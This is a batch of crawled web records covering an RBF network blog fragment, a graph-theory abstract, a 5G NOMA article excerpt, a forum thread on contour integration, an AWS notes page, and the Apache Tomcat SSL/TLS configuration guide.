We came up with gradient descent update formulas for all the RBF-NN parameters, given a fixed set of hyperparameters. In the next blog post, we'll discuss Stochastic Gradient Descent (SGD) for training. | 2018-12-18 13:40:54 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 2, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 1, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.920292317867279, "perplexity": 208.25582419166156}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-51/segments/1544376829399.59/warc/CC-MAIN-20181218123521-20181218145521-00198.warc.gz"} |
https://projecteuclid.org/euclid.jam/1355495113 | ## Journal of Applied Mathematics
### Bounds for the Kirchhoff Index of Bipartite Graphs
Yujun Yang
#### Abstract
A $(m,n)$-bipartite graph is a bipartite graph such that one bipartition has m vertices and the other bipartition has n vertices. The tree dumbbell $D(n,a,b)$ consists of the path ${P}_{n-a-b}$ together with a independent vertices adjacent to one pendent vertex of ${P}_{n-a-b}$ and b independent vertices adjacent to the other pendent vertex of ${P}_{n-a-b}$. In this paper, firstly, we show that, among $(m,n)$-bipartite graphs $(m\le n)$, the complete bipartite graph ${K}_{m,n}$ has minimal Kirchhoff index and the tree dumbbell $D(m+n,{\lfloor}n-\mathrm{(m}+1)/2{\rfloor},{\lceil}n-\mathrm{(m}+1)/2{\rceil})$ has maximal Kirchhoff index. Then, we show that, among all bipartite graphs of order $l$, the complete bipartite graph ${K}_{{\lfloor}l/2{\rfloor},l-{\lfloor}l/2{\rfloor}}$ has minimal Kirchhoff index and the path ${P}_{l}$ has maximal Kirchhoff index, respectively. Finally, bonds for the Kirchhoff index of $(m,n)$-bipartite graphs and bipartite graphs of order $l$ are obtained by computing the Kirchhoff index of these extremal graphs.
#### Article information
Source
J. Appl. Math., Volume 2012 (2012), Article ID 195242, 9 pages.
Dates
First available in Project Euclid: 14 December 2012
https://projecteuclid.org/euclid.jam/1355495113
Digital Object Identifier
doi:10.1155/2012/195242
Mathematical Reviews number (MathSciNet)
MR2915714
Zentralblatt MATH identifier
1245.05107
#### Citation
Yang, Yujun. Bounds for the Kirchhoff Index of Bipartite Graphs. J. Appl. Math. 2012 (2012), Article ID 195242, 9 pages. doi:10.1155/2012/195242. https://projecteuclid.org/euclid.jam/1355495113 | 2020-02-19 16:03:03 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 14, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.239802286028862, "perplexity": 920.2146862709128}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875144165.4/warc/CC-MAIN-20200219153707-20200219183707-00508.warc.gz"} |
https://journal.accsindia.org/non-orthogonal-multiple-access/ | Home > 5G Network > Non-Orthogonal Multiple Access
## Authors
### SANJEEV GURUGOPINATH
Department of Electronics and Communication Engineering, PES University
## Abstract
Non-orthogonal multiple access (NOMA) has been recently proposed as a technique to increase the network throughput and to support massive connectivity, which are major requirements in the fifth generation (5G) communication systems. The NOMA can be realized through two different approaches, namely, in (a) power-domain, and (b) code-domain. In the power-domain NOMA (PD-NOMA), multiple users are assigned different power levels – based on their individual channel quality information – over the same orthogonal resources. The functionality of PD-NOMA comprises of two main techniques, namely, superposition coding at the transmitter and successive interference cancellation (SIC) at the receiver. An efficient implementation of SIC would facilitate to remove interference across the users. The SIC is carried out at users with the best channel conditions and is performed in descending order of the channel. On the other hand, in the code-domain NOMA (CD-NOMA), multiplexing is carried out using low-density spreading sequences for each user, similar to the code division multiple access (CDMA) technology. In this article, we provide an introduction to NOMA and present the details on the working principle of NOMA systems. Later, we discuss the different types of NOMA schemes under PD- and CD-domains, and investigate the related applications in the context of 5G communication systems. Additionally, we discuss the integration of NOMA with other technologies related to 5G such as cognitive radio and massive MIMO, and discuss some future research challenges.
Index Terms—Fifth generation (5G) communication systems, interference mitigation, non-orthogonal multiple access (NOMA), successive interference cancellation (SIC), superposition coding (SC).
## 1 Wireless Communication Systems
The success story of the wireless communication technology is unprecedented. No other technology – neither the radio, television nor personal computers; not even the internet – has managed to attract billions of users in such a short time. Ever since the development of the first analog wireless communication system in the 1980s, a new generation of mobile communication system has been introduced in every decade. Each generation has received a considerable research attention in terms of the key innovations, wireless service, regulations and standards, from both the academia and the industry. The term innovations refers to the factors related to the underlying technology, while the term service represents the fundamental applications driving a particular generation – such as voice calling, messaging service, internet, etc.
In the following, we provide a brief overview on each generation of the mobile communication systems, in terms of innovations, services and standards.
### 1.1 First Generation (1G)
The spectrum during 1G was given free of cost to state-owned operators, and the user equipment, subscription, and the tariff were much higher as compared to the most expensive handsets and calling costs today. The basic service offered was high quality voice calling with excellent network coverage. Additionally, data communication such as facsimile was possible. The wireless standard used in the US was the advanced mobile phone system (AMPS); the Nordic mobile radio (NMR) system was used in most of European countries, and C-network – which marked the start of the subscriber identity module (SIM) – was used in Germany. The cellular handover across the European countries was not possible.
### 1.2 Second Generation (2G)
The groupe speciale mobile (GSM) was the dominant standard in 2G, which quickly gained worldwide popularity in the early 1990s. The other contemporary systems such as the IS-95 (in the US), and the Japanese personal digital (JPD) were proved to be no match to the growth of GSM. The monopoly of earlier operators was broken, which attracted competition from several operators in each country. This new regulation and the resulting competition is often credited for the massive success of GSM. Apart from voice calls, the short messaging system (SMS) was introduced; which not only became hugely popular, but also paved way for modern chatting applications such as WhatsApp. Digital data services were first introduced in GSM with a speed of $9.2$ kbps, which was further enhanced to tens of kbps to few hundreds of kbps through the general packet radio service (GPRS) and enhanced data rates for GSM evolution (EDGE) technologies, respectively. In terms of innovations, the user equipment became smaller and lighter for good, with extended battery lifetime lasting upto a few hours.
### 1.3 Third Generation (3G)
The 3G era introduced the spectrum allotment via an open-market auction in some European countries such as the UK and Germany. Despite the high quoted prices, a few licenses were successfully auctioned. Subsequently, cellphones following the universal mobile telecommunication system (UMTS) were introduced. The selling point of UMTS was a high data rate of about $2$ Mbps. The initial models of UMTS phones were bulky with low battery life and attracted very less user attention, until phones comparable to the GSM-type models were manufactured. The auction-based regulation and the non user-friendly mobile phones were among several reasons which led to several industries filing bankruptcy and quitting the cellular business. The UMTS has largely turned out to be a superhype, and is proved to be a failure. Additionally, UMTS also faced a severe competition from the wireless local area network (WLAN) technology, which provided good connectivity with high data rates for a cheaper price.
### 1.4 Fourth Generation (4G)
The failure of UMTS and success of WLAN led to the introduction of the long term evolution (LTE) in 4G, which is essentially a cleverly modified version of WLAN. Additionally, the operators got the spectrum licenses for significantly less money. The simultaneously introduced elimination of roaming charges for services such as voice calling, SMS and data across the countries in parts of Europe and Asia helped in the success of LTE. The maximum speed promised by LTE is about $300$ Mbps in downlink and $50$ Mbps in uplink. Apart from the usual voice and data services, a technology similar to the voice over IP termed as the voice over LTE (VoLTE) has seen improved speech codec rates and voice quality. Currently, LTE is being improved with technologies such as massive multiple-input, multiple-output (MIMO) systems and device-to-device (D2D) communications.
### 1.5 Fifth Generation (5G)
The 5G systems are envisioned to start functioning from 2020 onwards, with several promises such as significant improvements in data rates (about $10-20$ Gbps), latency (about $1$ ms), and spectral efficiency, as compared to LTE. Additionally, D2D and machine-to-machine (M2M) communications leading to the successful implementation of internet-of-things (IoT) is expected to be a reality very soon. The services offered in 5G are expected to find applications across various scenarios including vehicular networks, e-health, education, and industrial IoT. Some of the key innovations that drive 5G include massive MIMO, cognitive radios, millimeter wave communications, network virtualization, and software defined networking, to name a few. Although research surrounding 5G seems promising and exciting, several stake holders believe that 5G is superhyped, similar to the UMTS during 3G era. The services and promises surrounding 5G are strikingly similar to what was envisioned during 3G era, which includes applications in vehicular networks and IoT. However, the debate on whether this claim is true, and if not, how should the technologies driving 5G are expected to compete against LTE and LTE advanced are relevant topics of discussion for another study.
A summary of key comparative aspects in 1G – 4G technologies are provided in Table 1.1. One of the “revolutionary” features in the above mentioned generation of wireless communications are their respective multiple access techniques. The multiple access technologies used in 1G, 2G, 3G and 4G are frequency division multiple access (FDMA), time division multiple access (TDMA), code division multiple access (CDMA) and orthogonal frequency division multiple access (OFDMA), respectively. In the next section, we provide a brief description of these techniques.
Parameters 1G 2G 3G 4G Year 1980s 1993 2001 2009 First Commercialization USA Finland Japan South Korea Technology AMPS, NMT IS95, GSM IMT2000, WCDMA LTE, WiMax Multiple Access FDMA TDMA CDMA OFDMA Switching Circuit Switching Circuit/Packet Switching Packet Switching Packet Switching Data Rates 2.4 – 14.4 kbps 14.4 kbps 3.1 Mbps 100 Mbps Special Characteristics First Wireless Digitalized 1G Broadband All IP, high speed Features Voice calls Multiple users voice calls Multimedia Live streaming Supports Voice Voice and Data Voice and Data Voice and Data Internet Services Nil Narrowband Broadband Ultra Broadband Bandwidth Analog 25 MHz 25 MHz 100 MHz Operating Frequencies 800 MHz 900/1800 MHz 2100 MHz 850.1800 MHz Band Type Narrowband Narrowband Wideband Ultra Wideband Carrier Frequency 30 kHz 200 kHz 5 MHz 15 MHz Advantages Simple SMS/MMS, Internet access High security, Roaming Speed, MIMO, Global mobility Disadvantages Limited capacity Limited network range High power consumption Hardware complexity Applications Voice calls Voice calls, SMS, Browsing Video conference, mobile TV High speed applications
## 2 Orthogonal Multiple Access (OMA)
From the theoretical and design principle point of view, the TDMA, FDMA, CDMA and OFDMA belong to the class of orthogonal multiple access (OMA) techniques. The techniques in OMA all share a set of resources across users, which are orthogonal to each other. This enables successful separation of information-bearing signals intended for each user, by employing optimal, low-complexity and cost-efficient receiver structures. These orthogonal resources are time, frequency, code and sub-carriers in case of TDMA, FDMA, CDMA and OFDMA, respectively. Next, we provide a brief explanation on all these schemes, in the light of earlier generation of mobile communication systems. A schematic representation of FDMA, TDMA and CDMA is shown in Figure 1.
### 2.1 Frequency Division Multiple Access
In FDMA, each user is allocated different bandwidths, which are wide enough to carry the information-bearing signal spectrum. This OMA technique was widely used in classical wired telephone systems and subsequently in the 1G analog wireless systems. Other than that, FDMA is also used in digital TV cable television, fiber optics, and aerospace telemetry. Early satellite systems also used FDMA.
### 2.2 Time Division Multiple Access
The TDMA was an integral part of the 2G communication system, and is used by the celebrated GSM technology. In TDMA, every channel/bandwidth is divided into time slots and each user sends its information over different time slots, sequentially. Ideal for the relatively slowly varying voice signals – the backbone of GSM, the TDMA finds less utility in transmission of high-speed data. In GSM, the spectrum is divided into eight time slots of 200 kHz band each, where each slot is transmitted at a rate of 270 kbps using the Gaussian minimum shift keying (GMSK) modulation.
### 2.3 Code Division Multiple Access
One of the earliest forms of the direct sequence spread spectrum technique, CDMA spreads the data over the entire bandwidth with a lower power level. The CDMA is the dominant multiple access technology in 3G communication systems. Each user is assigned a sequence of spreading codes, which are orthonormal with each other. This technique enables the users to use the entire available bandwidth at the same time, without inter-user interference. In the IS-95 standard, CDMA is used with a digitally compressed voice at 13 kbps, which is spread using a 1.2288 Mbps chip sequence derived from a pseudo random code generator. As a result, the voice signal is spread over a bandwidth of 1.25 MHz. At the receiver, correlator circuit is used to separate out the intended signal from the rest. The wideband CDMA (W-CDMA) uses CDMA with 3.84 Mbps chip sequences over a 5 MHz wideband channel.
Pages ( 1 of 4 ): 1 234Next »
This site uses Akismet to reduce spam. Learn how your comment data is processed. | 2021-10-28 17:32:19 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.1993035227060318, "perplexity": 2194.590401480586}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323588398.42/warc/CC-MAIN-20211028162638-20211028192638-00119.warc.gz"} |
http://mathhelpforum.com/differential-geometry/137041-complex-contour-integration.html | 1. ## Complex contour integration
Let $\gamma$ be the square with vertices 0, 1, $\imath+1$, $\imath$ traversed counterclockwise. Evaluate
$\int_{\gamma}{|z|^2dz}$.
I parametrized and then deduced the formula:
$\int _{\gamma }\left|z|^2dz\right.=\sum _{i=1}^4 \int _{\gamma _i}|\gamma _i(t)|^2\gamma _i'(t)dt$. I come up with -1+ $\imath$ as the answer. Please verify, thank you.
2. Originally Posted by Eudaimonia
Let $\gamma$ be the square with vertices 0, 1, $i+1$, $i$ traversed counterclockwise. Evaluate
$\int_{\gamma}{|z|^2dz}$.
I parametrized and then deduced the formula:
$\int _{\gamma }\left|z|^2dz\right.=\sum _{i=1}^4 \int _{\gamma _i}|\gamma _i(t)|^2\gamma _i'(t)dt$. I come up with $-1+i$ as the answer. Please verify, thank you.
3. Originally Posted by Opalg
Why wouldn't the answer be zero under Cauchy's theorem?
4. Please correct me if I'm wrong, but I don't think f(z)=|z|^2 is holomorphic at 0, and thus it does not meet that requirement of Cauchy's integral theorem.
5. because |z|^2 = zz* is not analytic
Originally Posted by davismj
Why wouldn't the answer be zero under Cauchy's theorem?
6. Originally Posted by xxp9
because |z|^2 = zz* is not analytic
duh | 2016-10-21 22:56:51 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 12, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9663518071174622, "perplexity": 1289.9917151358352}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-44/segments/1476988718309.70/warc/CC-MAIN-20161020183838-00025-ip-10-171-6-4.ec2.internal.warc.gz"} |
https://devops-coding-challenge.readthedocs.io/en/latest/FromMakefile/BIBLIOGRAPHY.html | # Bibliography¶
Here are some links to understand choices.
## Hooks¶
Because I would automate the update of docs/FromMakefile [because of include ../file.md is missing in markdown, even with recommonmark]
## AWS¶
### Collections¶
• Documentation to filter over collections
• Warning Behind the scenes, the above example will call ListBuckets, ListObjects, and HeadObject many times. If you have a large number of S3 objects then this could incur a significant cost. | 2022-10-06 13:26:08 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3161259889602661, "perplexity": 6761.709803516616}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337836.93/warc/CC-MAIN-20221006124156-20221006154156-00001.warc.gz"} |
http://pinnettech.com/docs/ssl-howto.html | ## SSL/TLS Configuration How-To
### Quick Start
The description below uses the variable name $CATALINA_BASE to refer the base directory against which most relative paths are resolved. If you have not configured Tomcat for multiple instances by setting a CATALINA_BASE directory, then$CATALINA_BASE will be set to the value of $CATALINA_HOME, the directory into which you have installed Tomcat. To install and configure SSL/TLS support on Tomcat, you need to follow these simple steps. For more information, read the rest of this How-To. 1. Create a keystore file to store the server's private key and self-signed certificate by executing the following command: Windows: "%JAVA_HOME%\bin\keytool" -genkey -alias tomcat -keyalg RSA Unix: $JAVA_HOME/bin/keytool -genkey -alias tomcat -keyalg RSA
and specify a password value of "changeit".
2. Uncomment the "SSL HTTP/1.1 Connector" entry in $CATALINA_BASE/conf/server.xml and modify as described in the Configuration section below. ### Introduction to SSL/TLS Transport Layer Security (TLS) and its predecessor, Secure Sockets Layer (SSL), are technologies which allow web browsers and web servers to communicate over a secured connection. This means that the data being sent is encrypted by one side, transmitted, then decrypted by the other side before processing. This is a two-way process, meaning that both the server AND the browser encrypt all traffic before sending out data. Another important aspect of the SSL/TLS protocol is Authentication. This means that during your initial attempt to communicate with a web server over a secure connection, that server will present your web browser with a set of credentials, in the form of a "Certificate", as proof the site is who and what it claims to be. In certain cases, the server may also request a Certificate from your web browser, asking for proof that you are who you claim to be. This is known as "Client Authentication," although in practice this is used more for business-to-business (B2B) transactions than with individual users. Most SSL-enabled web servers do not request Client Authentication. ### SSL/TLS and Tomcat It is important to note that configuring Tomcat to take advantage of secure sockets is usually only necessary when running it as a stand-alone web server. Details can be found in the Security Considerations Document. When running Tomcat primarily as a Servlet/JSP container behind another web server, such as Apache or Microsoft IIS, it is usually necessary to configure the primary web server to handle the SSL connections from users. Typically, this server will negotiate all SSL-related functionality, then pass on any requests destined for the Tomcat container only after decrypting those requests. Likewise, Tomcat will return cleartext responses, that will be encrypted before being returned to the user's browser. In this environment, Tomcat knows that communications between the primary web server and the client are taking place over a secure connection (because your application needs to be able to ask about this), but it does not participate in the encryption or decryption itself. ### Certificates In order to implement SSL, a web server must have an associated Certificate for each external interface (IP address) that accepts secure connections. The theory behind this design is that a server should provide some kind of reasonable assurance that its owner is who you think it is, particularly before receiving any sensitive information. While a broader explanation of Certificates is beyond the scope of this document, think of a Certificate as a "digital passport" for an Internet address. It states which organisation the site is associated with, along with some basic contact information about the site owner or administrator. This certificate is cryptographically signed by its owner, and is therefore extremely difficult for anyone else to forge. For the certificate to work in the visitors browsers without warnings, it needs to be signed by a trusted third party. These are called Certificate Authorities (CAs). To obtain a signed certificate, you need to choose a CA and follow the instructions your chosen CA provides to obtain your certificate. A range of CAs is available including some that offer certificates at no cost. Java provides a relatively simple command-line tool, called keytool, which can easily create a "self-signed" Certificate. Self-signed Certificates are simply user generated Certificates which have not been signed by a well-known CA and are, therefore, not really guaranteed to be authentic at all. While self-signed certificates can be useful for some testing scenarios, they are not suitable for any form of production use. ### General Tips on Running SSL When securing a website with SSL it's important to make sure that all assets that the site uses are served over SSL, so that an attacker can't bypass the security by injecting malicious content in a javascript file or similar. To further enhance the security of your website, you should evaluate to use the HSTS header. It allows you to communicate to the browser that your site should always be accessed over https. Using name-based virtual hosts on a secured connection requires careful configuration of the names specified in a single certificate or Tomcat 8.5 onwards where Server Name Indication (SNI) support is available. SNI allows multiple certificates with different names to be associated with a single TLS connector. ### Configuration #### Prepare the Certificate Keystore Tomcat currently operates only on JKS, PKCS11 or PKCS12 format keystores. The JKS format is Java's standard "Java KeyStore" format, and is the format created by the keytool command-line utility. This tool is included in the JDK. The PKCS12 format is an internet standard, and can be manipulated via (among other things) OpenSSL and Microsoft's Key-Manager. Each entry in a keystore is identified by an alias string. Whilst many keystore implementations treat aliases in a case insensitive manner, case sensitive implementations are available. The PKCS11 specification, for example, requires that aliases are case sensitive. To avoid issues related to the case sensitivity of aliases, it is not recommended to use aliases that differ only in case. To import an existing certificate into a JKS keystore, please read the documentation (in your JDK documentation package) about keytool. Note that OpenSSL often adds readable comments before the key, but keytool does not support that. So if your certificate has comments before the key data, remove them before importing the certificate with keytool. To import an existing certificate signed by your own CA into a PKCS12 keystore using OpenSSL you would execute a command like: openssl pkcs12 -export -in mycert.crt -inkey mykey.key -out mycert.p12 -name tomcat -CAfile myCA.crt -caname root -chain For more advanced cases, consult the OpenSSL documentation. To create a new JKS keystore from scratch, containing a single self-signed Certificate, execute the following from a terminal command line: Windows: "%JAVA_HOME%\bin\keytool" -genkey -alias tomcat -keyalg RSA Unix: $JAVA_HOME/bin/keytool -genkey -alias tomcat -keyalg RSA
(The RSA algorithm should be preferred as a secure algorithm, and this also ensures general compatibility with other servers and components.)
This command will create a new file, in the home directory of the user under which you run it, named ".keystore". To specify a different location or filename, add the -keystore parameter, followed by the complete pathname to your keystore file, to the keytool command shown above. You will also need to reflect this new location in the server.xml configuration file, as described later. For example:
Windows:
"%JAVA_HOME%\bin\keytool" -genkey -alias tomcat -keyalg RSA
-keystore \path\to\my\keystore
Unix:
$JAVA_HOME/bin/keytool -genkey -alias tomcat -keyalg RSA -keystore /path/to/my/keystore After executing this command, you will first be prompted for the keystore password. The default password used by Tomcat is "changeit" (all lower case), although you can specify a custom password if you like. You will also need to specify the custom password in the server.xml configuration file, as described later. Next, you will be prompted for general information about this Certificate, such as company, contact name, and so on. This information will be displayed to users who attempt to access a secure page in your application, so make sure that the information provided here matches what they will expect. Finally, you will be prompted for the key password, which is the password specifically for this Certificate (as opposed to any other Certificates stored in the same keystore file). The keytool prompt will tell you that pressing the ENTER key automatically uses the same password for the key as the keystore. You are free to use the same password or to select a custom one. If you select a different password to the keystore password, you will also need to specify the custom password in the server.xml configuration file. If everything was successful, you now have a keystore file with a Certificate that can be used by your server. #### Edit the Tomcat Configuration File Tomcat can use three different implementations of SSL: • JSSE implementation provided as part of the Java runtime • JSSE implementation that uses OpenSSL • APR implementation, which uses the OpenSSL engine by default The exact configuration details depend on which implementation is being used. If you configured Connector by specifying generic protocol="HTTP/1.1" then the implementation used by Tomcat is chosen automatically. If the installation uses APR - i.e. you have installed the Tomcat native library - then it will use the JSSE OpenSSL implementation, otherwise it will use the Java JSSE implementation. Auto-selection of implementation can be avoided if needed. It is done by specifying a classname in the protocol attribute of the Connector. To define a Java (JSSE) connector, regardless of whether the APR library is loaded or not, use one of the following: <!-- Define a HTTP/1.1 Connector on port 8443, JSSE NIO implementation --> <Connector protocol="org.apache.coyote.http11.Http11NioProtocol" sslImplementationName="org.apache.tomcat.util.net.jsse.JSSEImplementation" port="8443" .../> <!-- Define a HTTP/1.1 Connector on port 8443, JSSE NIO2 implementation --> <Connector protocol="org.apache.coyote.http11.Http11Nio2Protocol" sslImplementationName="org.apache.tomcat.util.net.jsse.JSSEImplementation" port="8443" .../> The OpenSSL JSSE implementation can also be configured explicitly if needed. If the APR library is installed (as for using the APR connector), using the sslImplementationName attribute allows enabling it. When using the OpenSSL JSSE implementation, the configuration can use either the JSSE attributes or the OpenSSL attributes (as used for the APR connector), but must not mix attributes from both types in the same SSLHostConfig or Connector element. <!-- Define a HTTP/1.1 Connector on port 8443, JSSE NIO implementation and OpenSSL --> <Connector protocol="org.apache.coyote.http11.Http11NioProtocol" port="8443" sslImplementationName="org.apache.tomcat.util.net.openssl.OpenSSLImplementation" .../> Alternatively, to specify an APR connector (the APR library must be available) use: <!-- Define a HTTP/1.1 Connector on port 8443, APR implementation --> <Connector protocol="org.apache.coyote.http11.Http11AprProtocol" port="8443" .../> If you are using APR or JSSE OpenSSL, you have the option of configuring an alternative engine to OpenSSL. <Listener className="org.apache.catalina.core.AprLifecycleListener" SSLEngine="someengine" SSLRandomSeed="somedevice" /> The default value is <Listener className="org.apache.catalina.core.AprLifecycleListener" SSLEngine="on" SSLRandomSeed="builtin" /> Also the useAprConnector attribute may be used to have Tomcat default to using the APR connector rather than the NIO connector: <Listener className="org.apache.catalina.core.AprLifecycleListener" useAprConnector="true" SSLEngine="on" SSLRandomSeed="builtin" /> So to enable OpenSSL, make sure the SSLEngine attribute is set to something other than off. The default value is on and if you specify another value, it has to be a valid OpenSSL engine name. SSLRandomSeed allows to specify a source of entropy. Productive system needs a reliable source of entropy but entropy may need a lot of time to be collected therefore test systems could use no blocking entropy sources like "/dev/urandom" that will allow quicker starts of Tomcat. The final step is to configure the Connector in the $CATALINA_BASE/conf/server.xml file, where $CATALINA_BASE represents the base directory for the Tomcat instance. An example <Connector> element for an SSL connector is included in the default server.xml file installed with Tomcat. To configure an SSL connector that uses JSSE, you will need to remove the comments and edit it so it looks something like this: <!-- Define a SSL Coyote HTTP/1.1 Connector on port 8443 --> <Connector protocol="org.apache.coyote.http11.Http11NioProtocol" port="8443" maxThreads="200" scheme="https" secure="true" SSLEnabled="true" keystoreFile="${user.home}/.keystore" keystorePass="changeit"
clientAuth="false" sslProtocol="TLS"/>
Note: If tomcat-native is installed, the configuration will use JSSE with an OpenSSL implementation, which supports either this configuration or the APR configuration example given below.
The APR connector uses different attributes for many SSL settings, particularly keys and certificates. An example of an APR configuration is:
<!-- Define a SSL Coyote HTTP/1.1 Connector on port 8443 -->
<Connector
protocol="org.apache.coyote.http11.Http11AprProtocol"
scheme="https" secure="true" SSLEnabled="true"
SSLCertificateFile="/usr/local/ssl/server.crt"
SSLCertificateKeyFile="/usr/local/ssl/server.pem"
SSLVerifyClient="optional" SSLProtocol="TLSv1+TLSv1.1+TLSv1.2"/>
The configuration options and information on which attributes are mandatory, are documented in the SSL Support section of the HTTP connector configuration reference. Make sure that you use the correct attributes for the connector you are using. The NIO and NIO2 connectors use JSSE unless the JSSE OpenSSL implementation is installed (in which case it supports either the JSSE or OpenSSL configuration styles), whereas the APR/native connector uses APR.
The port attribute is the TCP/IP port number on which Tomcat will listen for secure connections. You can change this to any port number you wish (such as to the default port for https communications, which is 443). However, special setup (outside the scope of this document) is necessary to run Tomcat on port numbers lower than 1024 on many operating systems.
If you change the port number here, you should also change the value specified for the redirectPort attribute on the non-SSL connector. This allows Tomcat to automatically redirect users who attempt to access a page with a security constraint specifying that SSL is required, as required by the Servlet Specification.
After completing these configuration changes, you must restart Tomcat as you normally do, and you should be in business. You should be able to access any web application supported by Tomcat via SSL. For example, try:
https://localhost:8443/
and you should see the usual Tomcat splash page (unless you have modified the ROOT web application). If this does not work, the following section contains some troubleshooting tips.
### Installing a Certificate from a Certificate Authority
To obtain and install a Certificate from a Certificate Authority (like verisign.com, thawte.com or trustcenter.de), read the previous section and then follow these instructions:
#### Create a local Certificate Signing Request (CSR)
In order to obtain a Certificate from the Certificate Authority of your choice you have to create a so called Certificate Signing Request (CSR). That CSR will be used by the Certificate Authority to create a Certificate that will identify your website as "secure". To create a CSR follow these steps:
• Create a local self-signed Certificate (as described in the previous section):
keytool -genkey -alias tomcat -keyalg RSA
-keystore <your_keystore_filename>
Note: In some cases you will have to enter the domain of your website (i.e. www.myside.org) in the field "first- and lastname" in order to create a working Certificate.
• The CSR is then created with:
keytool -certreq -keyalg RSA -alias tomcat -file certreq.csr
-keystore <your_keystore_filename>
Now you have a file called certreq.csr that you can submit to the Certificate Authority (look at the documentation of the Certificate Authority website on how to do this). In return you get a Certificate.
#### Importing the Certificate
Now that you have your Certificate you can import it into you local keystore. First of all you have to import a so called Chain Certificate or Root Certificate into your keystore. After that you can proceed with importing your Certificate.
• Download a Chain Certificate from the Certificate Authority you obtained the Certificate from.
For Verisign.com commercial certificates go to: http://www.verisign.com/support/install/intermediate.html
For Verisign.com trial certificates go to: http://www.verisign.com/support/verisign-intermediate-ca/Trial_Secure_Server_Root/index.html
For Trustcenter.de go to: http://www.trustcenter.de/certservices/cacerts/en/en.htm#server
For Thawte.com go to: http://www.thawte.com/certs/trustmap.html
• Import the Chain Certificate into your keystore
keytool -import -alias root -keystore <your_keystore_filename>
-trustcacerts -file <filename_of_the_chain_certificate>
• And finally import your new Certificate
keytool -import -alias tomcat -keystore <your_keystore_filename>
-file <your_certificate_filename>
### Using OCSP Certificates
To use Online Certificate Status Protocol (OCSP) with Apache Tomcat, ensure you have downloaded, installed, and configured the Tomcat Native Connector. Furthermore, if you use the Windows platform, ensure you download the ocsp-enabled connector.
To use OCSP, you require the following:
• OCSP-enabled certificates
• Tomcat with SSL APR connector
• Configured OCSP responder
